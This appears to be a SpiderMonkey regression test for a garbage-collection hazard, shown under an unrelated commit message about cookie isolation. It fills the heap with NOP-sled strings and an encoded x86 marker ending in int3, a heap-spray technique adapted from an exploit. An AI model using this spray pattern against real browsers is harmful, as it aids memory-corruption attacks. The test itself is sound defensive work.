Sat, 03 Jan 2015 20:18:00 +0100
Conditionally enable double key logic according to:
private browsing mode or privacy.thirdparty.isolate preference and
implement in GetCookieStringCommon and FindCookie where it counts...
With some reservations about how to convince FindCookie users to test the
condition and pass a nullptr when double key logic is disabled.
1 /* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
2 /* This Source Code Form is subject to the terms of the Mozilla Public
3 * License, v. 2.0. If a copy of the MPL was not distributed with this
4 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
6 //-----------------------------------------------------------------------------
// Regression test for bug 338804, a GC hazard in constructor functions.
// There is no computed result: the test passes by not crashing, so `actual`
// and `expect` are fixed up front and compared unchanged at the very end.
var BUGNUMBER = 338804;
var summary = 'GC hazards in constructor functions';
var actual = 'No Crash';
var expect = 'No Crash';

printBugNumber(BUGNUMBER);
printStatus(summary);
printStatus('Uses Intel Assembly');

// Adapted from an in-page reproduction of the SpiderMonkey Script() hazard
// (the <script> markers and the timer fallback noted below are leftovers
// of that).
//
// `scale` sizes the heap fill performed by fillHeap(); the value that
// reliably exposed the hazard differed per build:
//   BonEcho/2.0a2: 3000
//   Firefox/1.5.0.4: 2000
var rooter;
var scale = 2000;

// The page version deferred this call with setTimeout(exploit, 2000) when a
// timer was available; the shell harness runs it synchronously.
exploit();
function exploit() {
  // Script() is a non-standard SpiderMonkey constructor; on an engine that
  // lacks it there is nothing to exercise, so report the skip and return.
  if (typeof Script === 'undefined') {
    print('Test skipped. Script not defined.');
    return;
  }
  // The argument's toString hook is fillHeap, so the heap is churned while
  // the constructor is still converting its argument -- presumably the point
  // at which the original bug held an unrooted value. It runs twice so the
  // second call presumably operates on a heap the first already filled.
  Script({ toString: fillHeap });
  Script({ toString: fillHeap });
}
function createPayload() {
  // Nine doublings give 512 copies of the filler unit. The string is grown
  // by repeated concatenation (not String.prototype.repeat) so the
  // allocation pattern stays the same as in the original test.
  var DOUBLINGS = 9;
  var result = "\u9090";
  var round = 0;
  while (round < DOUBLINGS) {
    result = result + result;
    round += 1;
  }
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  // The trailing marker ends in int3 (see the disassembly above), so a
  // mis-rooted object reached through it shows up as an immediate trap in
  // the test run rather than as silent misbehaviour.
  result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
  return result;
}
function fillHeap() {
  // Invoked as a toString hook from exploit(): the empty return value is
  // irrelevant, the allocation side effect is the point. `rooter` is the
  // file-level global, presumably so the strings stay reachable (rooted)
  // for the rest of the run instead of being collected mid-test.
  rooter = [];
  var payload = createPayload();
  var limit = scale * 2;
  var block = "";
  var i;
  // First half: progressively longer strings, each one payload longer
  // than the previous entry.
  for (i = 0; i < scale; i++) {
    block += payload;
    rooter[i] = block;
  }
  // Second half: one payload per slot, made distinct by the index suffix.
  for (i = scale; i < limit; i++) {
    rooter[i] = payload + i;
  }
  return "";
}
68 // </script>
// `actual` is never reassigned: reaching this line without a crash is the pass.
reportCompare(expect, actual, summary);